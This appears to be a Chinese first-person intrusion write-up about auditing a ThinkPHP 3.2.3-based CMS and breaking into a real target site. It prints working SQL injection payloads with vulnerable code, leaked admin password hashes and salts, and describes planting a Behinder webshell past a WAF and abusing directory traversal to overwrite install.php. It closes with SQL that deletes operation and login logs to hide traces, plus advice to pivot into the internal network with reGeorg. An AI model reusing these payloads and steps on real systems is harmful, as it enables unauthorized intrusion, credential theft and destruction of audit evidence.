某个深夜,waf师傅丢了一套源码给我,以及一个对应的目标站点。
该cms基于tp3.2.3二次开发,已知该版本存在多种sql注入类型以及缓存文件漏洞。
漏洞已提交至CNVD
简要概括如下
利用字符串方式作为where传参时存在注入
1) and 1=updatexml(1,concat(0x7e,(user()),0x7e),1)--+
这里使用全局数组进行传参(不要用I方法),漏洞才能生效
public function getuser(){
$User = D('User');
$map = array('id' => $_GET['id']);
$user = $User->where($map)->find();
dump($user);
}
id[0]=exp&id[1]==1 and 1=(updatexml(1,concat(0x7e,(user()),0x7e),1))--+
public function getuser(){
$data['id'] = I('id');
$uname['username'] = I('username');
$user = M('User')->where($data)->save($uname);
dump($user);
}
id[0]=bind&id[1]=0 and 1=(updatexml(1,concat(0x7e,(user()),0x7e),1))&username=fanxing
public function getuser(){
$user = M('User')->find(I('id'));
dump($user);
}
?id[where]=1 and 1=updatexml(1,concat(0x7e,(user()),0x7e),1)
public function user(){
$data['username'] = array('eq','admin');
$user = M('User')->where($data)->order(I('order'))->find();
dump($user);
}
order=id and(updatexml(1,concat(0x7e,(select user())),0))
public function test(){
S('name',I('test'));
}
最终找到几处后台sql注入、存储型xss、后台RCE(目录穿越)
具体细节就不写了,漏洞触发点如下
很明显,直接构造发包
但是需要开启debug、且需要登录后台
类似的漏洞还有1处。
模版管理,懂得都懂
附件管理,懂得都懂
这里可以跟一下,寻找对应的上传点
后台登录日志
但是目标站点的后台开启了http-only,因此无法利用xss获取cookie
后台操作日志的xss注入点在referer
中
在这个实际站点中用处不大,就不展开了。
后台漏洞审了一大堆没啥用,前台功能代码很少,大致看了一遍,不存在注入。
这时候waf师傅告诉我目标的前台搜索框处存在sql注入。
我????
于是对比网上下载的审计源码,发现原来源码中与搜索框相关的功能未实现,目标站点的搜索框是自己写的代码。
既然存在注入,那么直接读取后台管理员账户。
本地查看数据库如下
跟进源码发现password加密方式如下
md5($pass.md5($verify));
写个脚本注出后台用户数据
# admin,admin1
# 19369424b3f933c41324978106c411cc,9509b82e3ddf251f2ea825b49ab6d291
# lnwkNC,XW7YXl
cmd5查询,查询到了admin1账户密码
得到admin1/admin123!
登进去一看,admin1
只有管理内容/修改密码
两个功能,无法getshell,于是又把内容管理的相关功能进行审计,还是无法getshell。
既然已知加密方式和salt,开始本地爆破,一开始跑了十几万的字典还是没成功。
没办法,只能碰碰运气,用公司名、地级名、成立年份等信息生成一个自定义字典,本地一跑,卧槽成了!!!
登录之后尝试后台RCE,修改模版header.php
,但是用哥斯拉居然被拦截了。
X-Powered-By: SDWAF
换成冰蝎马的成功绕过waf,但是访问前台又出现一个奇怪的单引号导致的语法错误。。。
最终,增加、编辑模版处还存在目录穿越,修改根目录的/install.php
源码中并未对..\
以及../
进行处理
简单测试后发现,phpinfo中没有设置disable_func
,却无法执行系统命令。。。
只能靠执行php函数
error_reporting(E_ALL);var_dump(1);
var_dump(scandir('.'));
readfile('web.config');
读取数据库账号密码
'DB_TYPE' => 'mysql',
'DB_HOST' => '180.xxx',
'DB_NAME' => 'xxx',
'DB_USER' => 'xxx',
'DB_PWD' => 'xxx',
'DB_PORT' => '3306',
'DB_PREFIX' => 'wexxx',
发现是站库分离,远程连接。
select user()
select @@basedir;
show variables like '%secure%'
发现是linux系统,当前账户权限较低无法读取文件、修改配置、os-shell
先痕迹清除,第二天晚上下班继续
select * from XXX.perationlog limit 10
DELETE FROM XXX.rationlog WHERE id > 7000
DELETE FROM XXX._loginlog WHERE id > 3000
unlink('test.php');
除此之外,还可以传个reGeorg正向代理,继续扫描内网。